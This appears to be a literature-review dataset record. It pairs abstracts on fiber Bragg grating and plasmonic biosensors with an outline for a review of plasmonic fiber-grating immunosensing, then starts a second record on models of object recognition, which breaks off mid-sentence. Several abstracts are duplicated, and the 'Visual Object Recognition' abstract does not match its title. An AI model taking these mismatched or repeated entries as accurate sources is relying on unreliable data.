an immobilized antibody biosensor paper_content: An immunosensor using a long-period grating (LPG) was used for sensitive detection of antibody−antigen reactions. Goat anti-human IgG (antibody) was immobilized on the surface of the LPG, and detection of specific antibody−antigen binding was investigated. This sensor operates using total internal reflection where an evanescent field interacts with bound antibody immobilized over the grating region. The reaction between antibody and antigen altered the LPG transmission spectrum and was monitored in real time as a change in refractive index, thereby eliminating the need for labeling antigen molecules. Human IgG binding was observed to be concentration dependent over a range of 2−100 μg mL^-1, and equilibrium bound antigen levels could be attained in ∼5 min using an initial rate determination. Binding specificity was confirmed using human interleukin-2 and bovine serum albumin as controls, and nonspecific adsorption of proteins did not significantly interfere with detection of binding. Antigen detection in a... --- paper_title: Detecting hybridization of DNA by highly sensitive evanescent field etched core fiber Bragg grating sensors paper_content: Highly sensitive fiber Bragg grating sensors were developed by etching away the cladding and part of the core of the fiber and detecting the change of Bragg wavelength due to the change of index of the surrounding medium. A sensitivity of 1394 nm/RIU was achieved when the diameter of the grating core was 3.4 μm and the index of the surrounding medium was close to the index of the core of the fiber. Assuming a detectable spectral resolution of 0.01 nm realized in the experiment, the sensor achieves a minimum detectable index resolution of 7.2 × 10^-6. Higher sensitivity at lower surrounding index was achieved by using higher order modes excited in the Bragg grating region. The use of the fiber Bragg grating sensor was further investigated to detect hybridization of DNA.
Single-stranded DNA oligonucleotide probes of 20 bases were immobilized on the surface of the fiber grating using relatively common glutaraldehyde chemistry. Hybridization of the complementary target single-stranded DNA oligonucleotide was monitored in situ and successfully detected. The demonstrated fiber Bragg grating sensors provide an elegant method to monitor biological changes in an in situ manner, and provide temporal information in a single experiment. --- paper_title: Giant sensitivity of long period gratings in transition mode near the dispersion turning point: an integrated design approach paper_content: We report an original design approach based on the modal dispersion curves for the development of long period gratings in transition mode near the dispersion turning point exhibiting ultrahigh refractive index sensitivity. The theoretical model predicting a giant sensitivity of 9900 nm per refractive index unit in an aqueous environment was experimentally validated with a result of approximately 9100 nm per refractive index unit around an ambient index of 1.3469. This result places thin film coated LPGs as an alternative to other fiber-based technologies for high-performance chemical and biological sensing applications. --- paper_title: Sensitive optical biosensors for unlabeled targets: A review paper_content: This article reviews the recent progress in optical biosensors that use the label-free detection protocol, in which biomolecules are unlabeled or unmodified, and are detected in their natural forms. In particular, it will focus on the optical biosensors that utilize the refractive index change as the sensing transduction signal. Various optical label-free biosensing platforms will be introduced, including, but not limited to, surface plasmon resonance, interferometers, waveguides, fiber gratings, ring resonators, and photonic crystals. Emphasis will be given to the description of optical structures and their respective sensing mechanisms. Examples of detecting various types of biomolecules will be presented. Wherever possible, the sensing performance of each optical structure will be evaluated and compared in terms of sensitivity and detection limit. --- paper_title: Manufacturing and Spectral Features of Different Types of Long Period Fiber Gratings: Phase-Shifted, Turn-Around Point, Internally Tilted, and Pseudo-Random paper_content: The manufacturing and spectral features of different types of long period fiber gratings (LPFGs), ranging from phase-shifted, turn-around point, and internally tilted gratings, to pseudo-random gratings, are described and discussed in detail. LPFGs were manufactured on boron-germanium co-doped photosensitive optical fibers with the point-by-point technique using an excimer KrF laser operating at 248 nm. The developed experimental setup to manufacture high-quality LPFGs was designed to totally customize any type of gratings with the possibility of setting different parameters, such as the grating period (or pitch), the number of grating planes, the number of laser shots for each plane, etc. Some important spectral features of the LPFGs’ spectra were taken into account. This allows the realization of homemade devices useful in several fiber-based applications, such as optical filtering, coupling systems, random lasers, physical and chemical sensing, and biosensing.
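The detection-limit figures quoted in the etched-core FBG abstract above follow from a simple ratio: the smallest resolvable index change equals the wavelength-readout resolution divided by the spectral sensitivity. A short check of that arithmetic is sketched below (Python); applying the same 0.01 nm readout resolution to the turn-around-point LPG sensitivity is an assumption made only for comparison.

# Minimum detectable refractive-index change = readout resolution / sensitivity.
def index_resolution(wavelength_resolution_nm, sensitivity_nm_per_riu):
    return wavelength_resolution_nm / sensitivity_nm_per_riu

# Etched-core FBG figures quoted above: 0.01 nm readout and 1394 nm/RIU.
print(index_resolution(0.01, 1394))   # ~7.2e-06 RIU, matching the abstract
# Turn-around-point LPG (~9100 nm/RIU measured), same 0.01 nm readout assumed.
print(index_resolution(0.01, 9100))   # ~1.1e-06 RIU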
--- paper_title: Long period fiber grating nano-optrode for cancer biomarker detection paper_content: Abstract We report an innovative fiber optic nano-optrode based on Long Period Gratings (LPGs) working in reflection mode for the detection of human Thyroglobulin (TG), a protein marker of differentiated thyroid cancer. The reflection-type LPG (RT-LPG) biosensor, coated with a single layer of atactic polystyrene (aPS) onto which a specific, high affinity anti-Tg antibody was adsorbed, allowed the label-free detection of Tg in the needle washouts of fine-needle aspiration biopsies, at concentrations useful for pre- and post-operative assessment of the biomarker levels. Analyte recognition and capture were confirmed with a parallel on fiber ELISA-like assay using, in pilot tests, the biotinylated protein and HRP-labeled streptavidin for its detection. Dose-dependent experiments showed that the detection is linearly dependent on concentration within the range between 0 and 4 ng/mL, while antibody saturation occurs for higher protein levels. The system is characterized by a very high sensitivity and specificity allowing the ex-vivo detection of sub ng/ml concentrations of human Tg from needle washouts of fine-needle aspiration biopsies of thyroid nodule from different patients. --- paper_title: Small biomolecule immunosensing with plasmonic optical fiber grating sensor. paper_content: This study reports on the development of a surface plasmon resonance (SPR) optical fiber biosensor based on tilted fiber Bragg grating technology for direct detection of small biomarkers of interest for lung cancer diagnosis. Since SPR principle relies on the refractive index modifications to sensitively detect mass changes at the gold coated surface, we have proposed here a comparative study in relation to the target size. Two cytokeratin 7 (CK7) samples with a molecular weight ranging from 78 kDa to 2.6 kDa, respectively CK7 full protein and CK7 peptide, have been used for label-free monitoring. This work has first consisted in the elaboration and the characterization of a robust and reproducible bioreceptor, based on antibody/antigen cross-linking. Immobilized antibodies were then utilized as binding agents to investigate the sensitivity of the biosensor towards the two CK7 antigens. Results have highlighted a very good sensitivity of the biosensor response for both samples diluted in phosphate buffer with a higher limit of detection for the larger CK7 full protein. The most groundbreaking nature of this study relies on the detection of small biomolecule CK7 peptides in buffer and in the presence of complex media such as serum, achieving a limit of detection of 0.4 nM. --- paper_title: Cancer biomarker sensing using packaged plasmonic optical fiber gratings: Towards in vivo diagnosis. paper_content: This work presents the development of an innovative plasmonic optical fiber (OF) immunosensor for the detection of cytokeratin 17 (CK17), a biomarker of interest for lung cancer diagnosis. The development of this sensing platform is such that it can be assessed in non-liquid environments, demonstrating that a surface plasmon resonance (SPR) can be excited in this case. For this purpose, detections have been first carried out on CK17 encapsulated in gel matrix in the aim of mimicking tissue samples. Gold-coated OF immunosensors were embedded in a specifically designed packaging providing enough stiffness to penetrate into soft matters. 
Resulting reflected spectra have revealed, for the first time, the presence of a stable SPR signal recorded in soft matters. Experiments conducted to detect CK17 trapped in a porous polyacrylamide gel matrix have highlighted the specific and selective biosensor response towards the target protein. Finally, the packaged OF immunosensor has been validated by a preliminary test on human lung biopsy, which has confirmed the ex-vivo CK17 detection. Consequently, this work represents an important milestone towards the detection of biomarkers in tissues, which is still a clinical challenge for minimally-invasive in vivo medical diagnosis. --- paper_title: Small biomolecule immunosensing with plasmonic optical fiber grating sensor. paper_content: This study reports on the development of a surface plasmon resonance (SPR) optical fiber biosensor based on tilted fiber Bragg grating technology for direct detection of small biomarkers of interest for lung cancer diagnosis. Since SPR principle relies on the refractive index modifications to sensitively detect mass changes at the gold coated surface, we have proposed here a comparative study in relation to the target size. Two cytokeratin 7 (CK7) samples with a molecular weight ranging from 78 kDa to 2.6 kDa, respectively CK7 full protein and CK7 peptide, have been used for label-free monitoring. This work has first consisted in the elaboration and the characterization of a robust and reproducible bioreceptor, based on antibody/antigen cross-linking. Immobilized antibodies were then utilized as binding agents to investigate the sensitivity of the biosensor towards the two CK7 antigens. Results have highlighted a very good sensitivity of the biosensor response for both samples diluted in phosphate buffer with a higher limit of detection for the larger CK7 full protein. The most groundbreaking nature of this study relies on the detection of small biomolecule CK7 peptides in buffer and in the presence of complex media such as serum, achieving a limit of detection of 0.4 nM. --- paper_title: Cancer biomarker sensing using packaged plasmonic optical fiber gratings: Towards in vivo diagnosis. paper_content: This work presents the development of an innovative plasmonic optical fiber (OF) immunosensor for the detection of cytokeratin 17 (CK17), a biomarker of interest for lung cancer diagnosis. The development of this sensing platform is such that it can be assessed in non-liquid environments, demonstrating that a surface plasmon resonance (SPR) can be excited in this case. For this purpose, detections have been first carried out on CK17 encapsulated in gel matrix in the aim of mimicking tissue samples. Gold-coated OF immunosensors were embedded in a specifically designed packaging providing enough stiffness to penetrate into soft matters. Resulting reflected spectra have revealed, for the first time, the presence of a stable SPR signal recorded in soft matters. Experiments conducted to detect CK17 trapped in a porous polyacrylamide gel matrix have highlighted the specific and selective biosensor response towards the target protein. Finally, the packaged OF immunosensor has been validated by a preliminary test on human lung biopsy, which has confirmed the ex-vivo CK17 detection. Consequently, this work represents an important milestone towards the detection of biomarkers in tissues, which is still a clinical challenge for minimally-invasive in vivo medical diagnosis. --- paper_title: Small biomolecule immunosensing with plasmonic optical fiber grating sensor. 
paper_content: This study reports on the development of a surface plasmon resonance (SPR) optical fiber biosensor based on tilted fiber Bragg grating technology for direct detection of small biomarkers of interest for lung cancer diagnosis. Since SPR principle relies on the refractive index modifications to sensitively detect mass changes at the gold coated surface, we have proposed here a comparative study in relation to the target size. Two cytokeratin 7 (CK7) samples with a molecular weight ranging from 78 kDa to 2.6 kDa, respectively CK7 full protein and CK7 peptide, have been used for label-free monitoring. This work has first consisted in the elaboration and the characterization of a robust and reproducible bioreceptor, based on antibody/antigen cross-linking. Immobilized antibodies were then utilized as binding agents to investigate the sensitivity of the biosensor towards the two CK7 antigens. Results have highlighted a very good sensitivity of the biosensor response for both samples diluted in phosphate buffer with a higher limit of detection for the larger CK7 full protein. The most groundbreaking nature of this study relies on the detection of small biomolecule CK7 peptides in buffer and in the presence of complex media such as serum, achieving a limit of detection of 0.4 nM. --- paper_title: Cancer biomarker sensing using packaged plasmonic optical fiber gratings: Towards in vivo diagnosis. paper_content: This work presents the development of an innovative plasmonic optical fiber (OF) immunosensor for the detection of cytokeratin 17 (CK17), a biomarker of interest for lung cancer diagnosis. The development of this sensing platform is such that it can be assessed in non-liquid environments, demonstrating that a surface plasmon resonance (SPR) can be excited in this case. For this purpose, detections have been first carried out on CK17 encapsulated in gel matrix in the aim of mimicking tissue samples. Gold-coated OF immunosensors were embedded in a specifically designed packaging providing enough stiffness to penetrate into soft matters. Resulting reflected spectra have revealed, for the first time, the presence of a stable SPR signal recorded in soft matters. Experiments conducted to detect CK17 trapped in a porous polyacrylamide gel matrix have highlighted the specific and selective biosensor response towards the target protein. Finally, the packaged OF immunosensor has been validated by a preliminary test on human lung biopsy, which has confirmed the ex-vivo CK17 detection. Consequently, this work represents an important milestone towards the detection of biomarkers in tissues, which is still a clinical challenge for minimally-invasive in vivo medical diagnosis. --- paper_title: Plasmonic nanoshell functionalized etched fiber Bragg gratings for highly sensitive refractive index measurements paper_content: A novel fiber optical refractive index sensor based on gold nanoshells immobilized on the surface of an etched single-mode fiber including a Bragg grating is demonstrated. The nanoparticle coating induces refractive index dependent waveguide losses, because of the variation of the evanescently guided part of the light. Hence the amplitude of the Bragg reflection is highly sensitive to refractive index changes of the surrounding medium. 
The nanoshell functionalized fiber optical refractive index sensor works in reflectance mode, is suitable for chemical and biochemical sensing, and shows an intensity dependency of 4400% per refractive index unit in the refractive index range between 1.333 and 1.346. Furthermore, the physical length of the sensor is smaller than 3 mm with a diameter of 6 μm, and therefore offers the possibility of a localized refractive index measurement. --- paper_title: Fiber Bragg grating assisted surface plasmon resonance sensor with graphene oxide sensing layer paper_content: Abstract A single mode fiber Bragg grating (FBG) is used to generate Surface Plasmon Resonance (SPR). The uniform gratings of the FBG are used to scatter light from the fiber optic core into the cladding thus enabling the interaction between the light and a thin gold film in order to generate SPR. Applying this technique, the cladding around the FBG is left intact, making this sensor very robust and easy to handle. A thin film of graphene oxide (GO) is deposited over a 45 nm gold film to enhance the sensitivity of the SPR sensor. The gold coated sensor demonstrated high sensitivity of approximately 200 nm/RIU when tested with different concentrations of ethanol in an aqueous medium. A 2.5 times improvement in sensitivity is observed with the GO enhancement compared to the gold coated sensor. --- paper_title: Graphene-controlled fiber Bragg grating and enabled optical bistability. paper_content: We report a graphene-assisted all-optical control of a fiber Bragg grating (FBG), which enables in-fiber optical bistability and switching. With an optical pump, a micro-FBG wrapped by graphene evolves into chirped and phase-shifted FBGs, whose characteristic wavelengths and bandwidths could be controlled by the pump power. Optical bistability and multistability are achieved in the controlled FBG based on a shifted Bragg reflection or Fabry–Perot-type resonance, which allow the implementation of optical switching with an extinction ratio exceeding 20 dB and a response time in tens of milliseconds. --- paper_title: Femtosecond Laser Inscribed Bragg Gratings in Low Loss CYTOP Polymer Optical Fiber paper_content: We report on the first inscription of fiber Bragg gratings (FBGs) in cyclic transparent optical polymer (CYTOP)-perfluorinated polymer optical fibers (POFs). We have used a direct write method with a femtosecond laser operating in the visible. The FBGs have a typical reflectivity of 70%, a bandwidth of 0.25 nm, a 3-mm length, and an index change of $\sim 10^{-4}$ . The FBGs operate in the $C$ -band, where CYTOP offers key advantages over polymethyl methacrylate optical fibers, displaying significantly lower optical loss in the important near-infrared (NIR) optical communications window. In addition, we note that CYTOP has a far lower affinity for water absorption and a core-mode refractive index that coincides with the aqueous index regime. These properties offer several unique opportunities for POF sensing at NIR wavelengths, such as compatibility with existing optical networks, the potential for POF sensor multiplexing and suitability for biosensing. We demonstrate compatibility with a commercial Bragg grating demodulator. --- paper_title: Challenges in the fabrication of fibre Bragg gratings in silica and polymer microstructured optical fibres paper_content: This paper reviews the state-of-the-art of grating fabrication in silica and polymer microstructured optical fibres. 
It focuses on the difficulties and challenges encountered during photo-inscription of such gratings and more specifically on the effect of the air hole lattice microstructure in the cladding of the fibre on the transverse coupling of the coherent writing light to the core region of the fibre. Experimental and computational quantities introduced thus far to assess the influence of the photonic crystal lattice on grating writing efficiency are reviewed as well, together with techniques that have been proposed to mitigate this influence. Finally, early proposals to adapt the microstructure in view of possibly enhancing multi-photon grating fabrication efficiency are discussed. --- paper_title: Graphene-coated microfiber Bragg grating for high-sensitivity gas sensing. paper_content: A graphene coated microfiber Bragg grating (GMFBG) for gas sensing is reported in this Letter. Taking advantage of the surface field enhancement and gas absorption of a GMFBG, we demonstrate an ultrasensitive approach to detect the concentration of chemical gas. The obtained sensitivities are 0.2 and 0.5 ppm for NH3 and xylene gas, respectively, which are tens of times higher than that of a GMFBG without graphene for tiny gas concentration change detection. Experimental results indicate that the GMFBG-based NH3 gas sensor has fast response due to its highly compact structure. Such a miniature fiber-optic element may find applications in high sensitivity gas sensing and trace analysis. --- paper_title: Surface plasmon excitation at near-infrared wavelengths in polymer optical fibers. paper_content: We report the first excitation of surface plasmon waves at near-infrared telecommunication wavelengths using polymer optical fibers (POFs) made of poly(methyl methacrylate) (PMMA). For this, weakly tilted fiber-Bragg gratings (TFBGs) have been photo-inscribed in the core of step-index POFs and the fiber coated with a thin gold layer. Surface plasmon resonance is excited with radially polarized modes and is spectrally observed as a singular extinction of some cladding-mode resonances in the transmitted amplitude spectrum of gold-coated TFBGs. The refractometric sensitivity can reach ∼550 nm/RIU (refractive index unit) with a figure of merit of more than 2000 and intrinsic temperature self-compensation. This kind of sensor is particularly relevant to in situ operation. --- paper_title: Plasmonic structure: fiber grating formed by gold nanorods on a tapered fiber. paper_content: The authors demonstrated the fabrication of a fiber Bragg grating-like plasmonic nanostructure on the surface of a tapered optical fiber using gold nanorods (GNRs). A multimode optical fiber with core and cladding diameters of 105 and 125 μm, respectively, was used to make a tapered fiber using a dynamic etching process. The tip diameter was ∼100 nm. Light from a laser was coupled to the untapered end of the fiber, which produced a strong evanescent field around the tapered section of the fiber. The gradient force due to the evanescent field trapped the GNRs on the surface of the tapered fiber. The authors explored possible causes of the GNR distribution. The plasmonic structure will be a good candidate for sensing based on surface enhanced Raman scattering. 
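The figure of merit quoted for the polymer-fiber SPR sensor above is usually defined as the spectral sensitivity divided by the resonance linewidth (FWHM); assuming that common definition (the abstract does not spell it out), the quoted ~550 nm/RIU and FOM > 2000 imply a sub-nanometre resonance width. A minimal check in Python:

def figure_of_merit(sensitivity_nm_per_riu, fwhm_nm):
    # Common SPR figure of merit: sensitivity divided by resonance linewidth.
    return sensitivity_nm_per_riu / fwhm_nm

sensitivity = 550.0          # nm/RIU, as quoted
fom_target = 2000.0          # lower bound quoted
print(sensitivity / fom_target)            # implied linewidth ~0.275 nm
print(figure_of_merit(sensitivity, 0.25))  # 2200.0, consistent with FOM > 2000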
--- paper_title: Fiber-optic anemometer based on single-walled carbon nanotube coated tilted fiber Bragg grating paper_content: In this work, a novel and simple optical fiber hot-wire anemometer based on single-walled carbon nanotubes (SWCNTs) coated tilted fiber Bragg grating (TFBG) is proposed and demonstrated. For the hot-wire wind speed sensor design, TFBG is an ideal in-fiber sensing structure due to its unique features. It is utilized as both light coupling and temperature sensing element without using any geometry-modified or uncommon fiber, which simplifies the sensor structure. To further enhance the thermal conversion capability, SWCNTs are coated on the surface of the TFBG instead of traditional metallic materials, which have excellent thermal characteristics. When a laser light is pumped into the sensor, the pump light propagating in the core will be easily coupled into cladding of the fiber via the TFBG and strongly absorbed by the SWCNTs thin film. This absorption acts like a hot-wire raising the local temperature of the fiber, which is accurately detected by the TFBG resonance shift. In the experiments, the sensor’s performances were investigated and controlled by adjusting the inherent angle of the TFBG, the thickness of SWCNTs film, and the input power of the pump laser. It was demonstrated that the developed anemometer exhibited significant light absorption efficiency up to 93%, and the maximum temperature of the local area on the fiber was heated up to 146.1°C under the relatively low pump power of 97.76 mW. The sensitivity of −0.3667 nm/(m/s) at wind speed of 1.0 m/s was measured with the selected 12° TFBG and 1.6 μm film. --- paper_title: Oxides and nitrides as alternative plasmonic materials in the optical range [Invited] paper_content: As alternatives to conventional metals, new plasmonic materials offer many advantages in the rapidly growing fields of plasmonics and metamaterials. These advantages include low intrinsic loss, semiconductor-based design, compatibility with standard nanofabrication processes, tunability, and others. Transparent conducting oxides such as Al:ZnO, Ga:ZnO and indium-tin-oxide (ITO) enable many high-performance metamaterial devices operating in the near-IR. Transition-metal nitrides such as TiN or ZrN can be substitutes for conventional metals in the visible frequencies. In this paper we provide the details of fabrication and characterization of these new materials and discuss their suitability for a number of metamaterial and plasmonic applications. --- paper_title: Small biomolecule immunosensing with plasmonic optical fiber grating sensor. paper_content: This study reports on the development of a surface plasmon resonance (SPR) optical fiber biosensor based on tilted fiber Bragg grating technology for direct detection of small biomarkers of interest for lung cancer diagnosis. Since SPR principle relies on the refractive index modifications to sensitively detect mass changes at the gold coated surface, we have proposed here a comparative study in relation to the target size. Two cytokeratin 7 (CK7) samples with a molecular weight ranging from 78 kDa to 2.6 kDa, respectively CK7 full protein and CK7 peptide, have been used for label-free monitoring. This work has first consisted in the elaboration and the characterization of a robust and reproducible bioreceptor, based on antibody/antigen cross-linking. Immobilized antibodies were then utilized as binding agents to investigate the sensitivity of the biosensor towards the two CK7 antigens. 
Results have highlighted a very good sensitivity of the biosensor response for both samples diluted in phosphate buffer with a higher limit of detection for the larger CK7 full protein. The most groundbreaking nature of this study relies on the detection of small biomolecule CK7 peptides in buffer and in the presence of complex media such as serum, achieving a limit of detection of 0.4 nM. --- paper_title: Optical bio-sensing devices based on etched fiber Bragg gratings coated with carbon nanotubes and graphene oxide along with a specific dendrimer paper_content: We demonstrate that etched fiber Bragg gratings (eFBGs) coated with single walled carbon nanotubes (SWNTs) and graphene oxide (GO) are highly sensitive and accurate biochemical sensors. Here, for detecting protein concanavalin A (Con A), mannose-functionalized poly(propyl ether imine) (PETIM) dendrimers (DMs) have been attached to the SWNTs (or GO) coated on the surface modified eFBG. The dendrimers act as multivalent ligands, having specificity to detect lectin Con A. The specificity of the sensor is shown by a much weaker response (a factor of ∼2500 for the SWNT and ∼2000 for the GO coated eFBG) to detect nonspecific lectin peanut agglutinin. DM molecules functionalized GO coated eFBG sensors showed excellent specificity to Con A even in the presence of excess amount of an interfering protein bovine serum albumin. The shift in the Bragg wavelength (Δλ_B) with respect to the λ_B values of SWNT (or GO)-DM coated eFBG for various concentrations of lectin follows a Langmuir-type adsorption isotherm, giving an affinity constant of ∼4 × 10^7 M^-1 for the SWNT-coated eFBG and ∼3 × 10^8 M^-1 for the GO-coated eFBG. --- paper_title: Plasmonic nanoshell functionalized etched fiber Bragg gratings for highly sensitive refractive index measurements paper_content: A novel fiber optical refractive index sensor based on gold nanoshells immobilized on the surface of an etched single-mode fiber including a Bragg grating is demonstrated. The nanoparticle coating induces refractive index dependent waveguide losses, because of the variation of the evanescently guided part of the light. Hence the amplitude of the Bragg reflection is highly sensitive to refractive index changes of the surrounding medium. The nanoshell functionalized fiber optical refractive index sensor works in reflectance mode, is suitable for chemical and biochemical sensing, and shows an intensity dependency of 4400% per refractive index unit in the refractive index range between 1.333 and 1.346. Furthermore, the physical length of the sensor is smaller than 3 mm with a diameter of 6 μm, and therefore offers the possibility of a localized refractive index measurement. ---
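The Langmuir-type response described in the dendrimer-coated eFBG abstract above can be written out explicitly: the fractional surface coverage is θ = K·c/(1 + K·c), and the Bragg-wavelength shift is taken as proportional to θ. The sketch below (Python/NumPy) uses the affinity constants quoted above; the 1 nm saturation shift and the concentration grid are hypothetical values chosen only to illustrate the shape of the curve.

import numpy as np

def langmuir_shift(concentration_m, k_affinity_per_m, max_shift_nm):
    # Fractional coverage theta = K*c / (1 + K*c); the observed Bragg shift is
    # assumed proportional to theta and saturates at max_shift_nm.
    c = np.asarray(concentration_m, dtype=float)
    theta = k_affinity_per_m * c / (1.0 + k_affinity_per_m * c)
    return max_shift_nm * theta

conc = np.logspace(-10, -6, 5)            # mol/L, hypothetical test points
print(langmuir_shift(conc, 4e7, 1.0))     # SWNT-coated eFBG, K ~ 4e7 M^-1
print(langmuir_shift(conc, 3e8, 1.0))     # GO-coated eFBG,   K ~ 3e8 M^-1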
Title: Plasmonic Optical Fiber-Grating Immunosensing: A Review Section 1: Introduction Description 1: Introduce the basic concepts of biosensors, label-free optical biosensors, and their applications. Explain the mechanism of surface plasmon resonance (SPR) and emphasize the advantages of optical fiber-based SPR sensors over traditional configurations. Section 2: Review of Grating Configurations Used for SPR Excitation Description 2: Review the different grating configurations used for SPR excitation in optical fibers, including their operating principles and practical benefits. Section 3: Unclad Uniform Fiber Bragg Gratings Description 3: Describe unclad uniform fiber Bragg gratings (FBGs), their structure, production techniques, sensitivity to temperature and axial strain, and their application in SPR excitation. Section 4: Tilted-Fiber Bragg Gratings Description 4: Discuss tilted-fiber Bragg gratings (TFBGs), their unique features, light coupling mechanisms, and their application for refractometry through surrounding index changes. Section 5: Excessively Tilted Fiber Gratings Description 5: Explain excessively tilted fiber gratings (ETFGs), their behavior, production techniques, and their effectiveness in SPR-based sensing. Section 6: Eccentric Fiber Bragg Gratings Description 6: Cover eccentric fiber Bragg gratings (EFBGs), focusing on their structure, production methods, and sensitivity to surrounding refractive index changes, comparing them to TFBGs. Section 7: Long-Period Fiber Gratings Description 7: Detail long-period fiber gratings (LPFGs), their role as forward-going cladding mode couplers, and their sensitivity to surrounding refractive index changes. Section 8: Additional Considerations Description 8: Discuss other important considerations in the development of SPR optical fiber sensors, including metal film coatings, nanoparticles, and the figure of merit (FOM) in sensor performance. Section 9: Interactions with Metals and Surface Biochemical Functionalization Description 9: Elaborate on the methods of metal layer deposition on fiber gratings and the subsequent surface functionalization for biosensing applications. Section 10: Interrogation of Plasmonic Fiber-Grating (Bio)chemical Sensors Description 10: Evaluate different techniques for interrogating plasmonic fiber-grating chemical and biochemical sensors, including spectral and intensity interrogation methods. Section 11: Spectrometer-Based Interrogation Description 11: Explain the principles and setups for spectrometer-based interrogation of plasmonic FBG sensors, and techniques for enhancing measurement resolution. Section 12: Intensity or Optical Power-Based Interrogation Description 12: Discuss intensity or optical power-based interrogation techniques and their practical implementation for plasmonic FBG sensors. Section 13: Other Interrogation Techniques Description 13: Explore alternative interrogation techniques using polarization analysis and phase measurement, highlighting their advantages in specific applications. Section 14: Protein and Cell Detection and Quantification Description 14: Summarize experimental demonstrations of fiber gratings used for protein and cell detection, focusing on their performance and practical implementations. Section 15: Overview of Plasmonic Fiber-Grating Immunosensors Description 15: Present a general survey of recent literature on plasmonic fiber-grating immunosensors, including their detection limits and performance indicators. 
Section 16: Detection of Cancer Biomarkers Description 16: Outline the steps involved in developing plasmonic fiber-grating immunosensors for cancer biomarker detection, emphasizing practical implementation in clinical diagnostics. Section 17: Conclusions Description 17: Conclude the review by summarizing the current state of fiber grating-based SPR immunosensors, their potential clinical applications, and future research directions.
Computational Models of Object Recognition in Cortex: A Review
14
--- paper_title: View-based Models of 3D Object Recognition: Invariance to Imaging Transformations paper_content: This report describes the main features of a view-based model of object recognition. The model does not attempt to account for specific cortical structures; it tries to capture general properties to be expected in a biological architecture for object recognition. The basic module is a regularization network (RBF-like; see Poggio and Girosi, 1989; Poggio, 1990) in which each of the hidden units is broadly tuned to a specific view of the object to be recognized. The network output, which may be largely view independent, is first described in terms of some simple simulations. The following refinements and details of the basic module are then discussed: (1) some of the units may represent only components of views of the object--the optimal stimulus for the unit, its "center," is effectively a complex feature; (2) the units' properties are consistent with the usual description of cortical neurons as tuned to multidimensional optimal stimuli and may be realized in terms of plausible biophysical mechanisms; (3) in learning to recognize new objects, preexisting centers may be used and modified, but also new centers may be created incrementally so as to provide maximal view invariance; (4) modules are part of a hierarchical structure--the output of a network may be used as one of the inputs to another, in this way synthesizing increasingly complex features and templates; (5) in several recognition tasks, in particular at the basic level, a single center using view-invariant features may be sufficient. --- paper_title: Representation And Recognition In Vision paper_content: Researchers have long sought to understand what the brain does when we see an object, what two people have in common when they see the same object, and what a "seeing" machine would need to have in common with a human visual system. Recent neurobiological and computational advances in the study of vision have now brought us close to answering these and other questions about representation. In Representation and Recognition in Vision, Shimon Edelman bases a comprehensive approach to visual representation on the notion of correspondence between proximal (internal) and distal similarities in objects. This leads to a computationally feasible and formally veridical representation of distal objects that addresses the needs of shape categorization and can be used to derive models of perceived similarity. Edelman first discusses the representational needs of various visual recognition tasks, and surveys current theories of representation in this context. He then develops a theory of representation that is related to Shepard's notion of second-order isomorphism between representations and their targets. Edelman goes beyond Shepard by specifying the conditions under which the representations can be made formally veridical. Edelman assesses his theory's performance in identification and categorization of 3D shapes and examines it in light of psychological and neurobiological data concerning the object-processing stream in primate vision. He also discusses the connections between his theory and other efforts to understand representation in the brain. --- paper_title: High-Level Vision: Object Recognition and Visual Cognition paper_content: Object recognition: shape-based recognition what is recognition? why object recognition is difficult. 
Approaches to object recognition: invariant properties and feature spaces parts and structural descriptions the alignment approach which is the correct approach?. The alignment of pictorial descriptions: using corresponding features the use of multiple models for 3-D objects aligning pictorial descriptions transforming the image or the models? before and after alignment. The alignment of smooth bounding contours: the curvate method accuracy of the curvature method empirical testing. Recognition by the combination of views: modelling objects by view combinations objects with sharp edges using two views only using a single view the use of depth values summary of the basic scheme objects with smooth boundaries recognition by image combinations extensions to the view-combination scheme psychophysical and physiological evidence interim conclusions: recognition by multiple views. Classifications: classification and identification the role of object classification class-based processing using class prototypes pictorial classification evidence from psychology and biology are classes in the world or in our head? the organization of recognition memory. Image and model correspondence: feature correspondence contour matching correspondence-less methods correspondence processes in human vision model construction compensating for illumination changes. Segmentation and saliency: is segmentation feasible? bottom-up and top-down segmentation extracting globally salient structures saliency, selection, and completion what can bottom-up segmentation achieve? Visual cognition and visual routines: perceiving "inside" and "outside" spatial analysis by visual routines conclusions and open problems the elemental operations the assembly and storage of routines routines and recognition. Sequence seeking and counter streams - a model for visual cortex: the sequence-seeking scheme biological embodiment summary. Appendices: alignment by feature the curvature method errors of the curvature method locally affine matching definitions. --- paper_title: Visual Object Recognition paper_content: Technical solutions are described for training an object-recognition neural network that identifies an object in a computer-readable image. An example method includes assigning a first neural network for determining a visual alignment model of the images for determining a normalized alignment of the object. The method further includes assigning a second neural network for determining a visual representation model of the images for recognizing the object. The method further includes determining the visual alignment model by training the first neural network and determining the visual representation model by training the second neural network independent of the first. The method further includes determining a combined object recognition model by training a combination of the first neural network and the second neural network. The method further includes recognizing the object in the image based on the combined object recognition model by passing the image through each of the neural networks. --- paper_title: High-Level Vision: Object Recognition and Visual Cognition paper_content: Object recognition: shape-based recognition what is recognition? why object recognition is difficult. Approaches to object recognition: invariant properties and feature spaces parts and structural descriptions the alignment approach which is the correct approach?. 
The alignment of pictorial descriptions: using corresponding features the use of multiple models for 3-D objects aligning pictorial descriptions transforming the image or the models? before and after alignment. The alignment of smooth bounding contours: the curvate method accuracy of the curvature method empirical testing. Recognition by the combination of views: modelling objects by view combinations objects with sharp edges using two views only using a single view the use of depth values summary of the basic scheme objects with smooth boundaries recognition by image combinations extensions to the view-combination scheme psychophysical and physiological evidence interim conclusions: recognition by multiple views. Classifications: classification and identification the role of object classification class-based processing using class prototypes pictorial classification evidence from psychology and biology are classes in the world or in our head? the organization of recognition memory. Image and model correspondence: feature correspondence contour matching correspondence-less methods correspondence processes in human vision model construction compensating for illumination changes. Segmentation and saliency: is segmentation feasible? bottom-up and top-down segmentation extracting globally salient structures saliency, selection, and completion what can bottom-up segmentation achieve? Visual cognition and visual routines: perceiving "inside" and "outside" spatial analysis by visual routines conclusions and open problems the elemental operations the assembly and storage of routines routines and recognition. Sequence seeking and counter streams - a model for visual cortex: the sequence-seeking scheme biological embodiment summary. Appendices: alignment by feature the curvature method errors of the curvature method locally affine matching definitions. --- paper_title: A Computational Model for Visual Selection paper_content: We propose a computational model for detecting and localizing instances from an object class in static gray-level images. We divide detection into visual selection and final classification, concentrating on the former: drastically reducing the number of candidate regions that require further, usually more intensive, processing, but with a minimum of computation and missed detections. Bottom-up processing is based on local groupings of edge fragments constrained by loose geometrical relationships. They have no a priori semantic or geometric interpretation. The role of training is to select special 